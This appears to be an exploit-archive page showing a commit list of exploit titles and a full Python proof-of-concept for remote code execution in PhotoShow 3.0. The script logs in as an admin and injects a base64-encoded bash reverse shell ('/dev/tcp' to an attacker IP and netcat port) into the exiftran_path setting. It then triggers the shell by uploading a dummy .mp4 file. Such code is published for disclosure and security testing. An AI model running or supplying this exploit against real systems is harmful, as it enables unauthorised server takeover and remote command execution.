d46ab98863
32 changes to exploits/shellcodes/ghdb Answerdev 1.0.3 - Account Takeover D-Link DIR-846 - Remote Command Execution (RCE) vulnerability Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow ERPNext 12.29 - Cross-Site Scripting (XSS) Liferay Portal 6.2.5 - Insecure Permissions GNU screen v4.9.0 - Privilege Escalation Apache Tomcat 10.1 - Denial Of Service PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated) BTCPay Server v1.7.4 - HTML Injection. Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE) Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS) ImageMagick 7.1.0-49 - DoS bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS) Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS) Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS) CKEditor 5 35.4.0 - Cross-Site Scripting (XSS) Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE) Froxlor 2.0.3 Stable - Remote Code Execution (RCE) ImageMagick 7.1.0-49 - Arbitrary File Read itech TrainSmart r1044 - SQL injection Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated) PhotoShow 3.0 - Remote Code Execution projectSend r1605 - Remote Code Exectution RCE Responsive FileManager 9.9.5 - Remote Code Execution (RCE) zstore 6.6.0 - Cross-Site Scripting (XSS) Binwalk v2.3.2 - Remote Command Execution (RCE) XWorm Trojan 2.1 - Null Pointer Derefernce DoS Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution) Linux/x86_64 - bash Shellcode with xor encoding
93 lines
No EOL
3.2 KiB
Python
Executable file
93 lines
No EOL
3.2 KiB
Python
Executable file
# Exploit Title: PhotoShow 3.0 - Remote Code Execution
|
|
# Date: January 11, 2023
|
|
# Exploit Author: LSCP Responsible Disclosure Lab
|
|
# Detailed Bug Description: https://lscp.llc/index.php/2021/07/19/how-white-box-hacking-works-remote-code-execution-and-stored-xss-in-photoshow-3-0/
|
|
# Vendor Homepage: https://github.com/thibaud-rohmer
|
|
# Software Link: https://github.com/thibaud-rohmer/PhotoShow
|
|
# Version: 3.0
|
|
# Tested on: Ubuntu 20.04 LTS
|
|
|
|
# creds of a user with admin privileges required
|
|
|
|
import sys
|
|
import requests
|
|
import base64
|
|
import urllib.parse
|
|
|
|
|
|
if(len(sys.argv)!=6):
|
|
print('Usage: \n\tpython3 ' + sys.argv[0] + ' "login" ' +
|
|
'"password" "target_ip" "attacker_ip" "attacker_nc_port"')
|
|
quit()
|
|
|
|
login=sys.argv[1]
|
|
password=sys.argv[2]
|
|
targetIp = sys.argv[3]
|
|
attackerIp = sys.argv[4]
|
|
attackerNcPort = sys.argv[5]
|
|
|
|
|
|
def main():
|
|
session = requests.Session()
|
|
#login as admin user
|
|
logInSession(session, targetIp, login, password)
|
|
#change application behaviour for handling .mp4 video
|
|
uploadExpoit(session, targetIp, attackerIp, attackerNcPort)
|
|
#send the shell to attaker's nc by uploading .mp4 video
|
|
sendMP4Video(session, targetIp)
|
|
print("Check your netcat")
|
|
|
|
def logInSession(session, targetIp, login, password):
|
|
session.headers.update({'Content-Type' : "application/x-www-form-urlencoded"})
|
|
data = "login="+login+"&password="+password
|
|
url = "http://"+targetIp+"/?t=Login"
|
|
response= session.post(url, data=data)
|
|
phpsessid=response.headers.get("Set-Cookie").split(";")[0]
|
|
session.headers.update({'Cookie' : phpsessid})
|
|
|
|
|
|
def uploadExpoit(session, targetIp, attackerIp, attackerNcPort):
|
|
exiftranPathInjection=createInjection(attackerIp, attackerNcPort)
|
|
url = "http://"+targetIp+"/?t=Adm&a=Set"
|
|
data = "name=PhotoShow&site_address=&loc=default.ini&user_theme=Default&" \
|
|
+ "rss=on&max_comments=50&thumbs_size=200&fbappid=&ffmpeg_path=&encode_video=on&"\
|
|
+ "ffmpeg_option=-threads+4+-vcodec+libx264+-acodec+libfdk_aac&rotate_image=on&"\
|
|
+ exiftranPathInjection
|
|
session.post(url, data=data).content.decode('utf8')
|
|
|
|
|
|
def createInjection(attakerIp, attackerNcPort):
|
|
textToEncode = "bash -i >& /dev/tcp/"+attackerIp+"/"+attackerNcPort+" 0>&1"
|
|
b64Encoded = base64.b64encode(textToEncode.encode("ascii"))
|
|
strb64 = str(b64Encoded)
|
|
strb64 = strb64[2:len(strb64)-1]
|
|
injection = {"exiftran_path":"echo "+ strb64 +" | base64 -d > /tmp/1.sh ;/bin/bash /tmp/1.sh"}
|
|
return urllib.parse.urlencode(injection)
|
|
|
|
def sendMP4Video(session, targetIp):
|
|
session.headers.update({'Content-Type' : "multipart/form-data; "\
|
|
+"boundary=---------------------------752343701418612422363028651"})
|
|
url = "http://"+targetIp+"/?a=Upl"
|
|
data = """-----------------------------752343701418612422363028651\r
|
|
Content-Disposition: form-data; name="path"\r
|
|
\r
|
|
\r
|
|
-----------------------------752343701418612422363028651\r
|
|
Content-Disposition: form-data; name="inherit"\r
|
|
\r
|
|
1\r
|
|
-----------------------------752343701418612422363028651\r
|
|
Content-Disposition: form-data; name="images[]"; filename="a.mp4"\r
|
|
Content-Type: video/mp4\r
|
|
\r
|
|
a\r
|
|
-----------------------------752343701418612422363028651--\r
|
|
"""
|
|
try:
|
|
session.post(url, data=data, timeout=0.001)
|
|
except requests.exceptions.ReadTimeout:
|
|
pass
|
|
|
|
|
|
if __name__ =="__main__":
|
|
main() |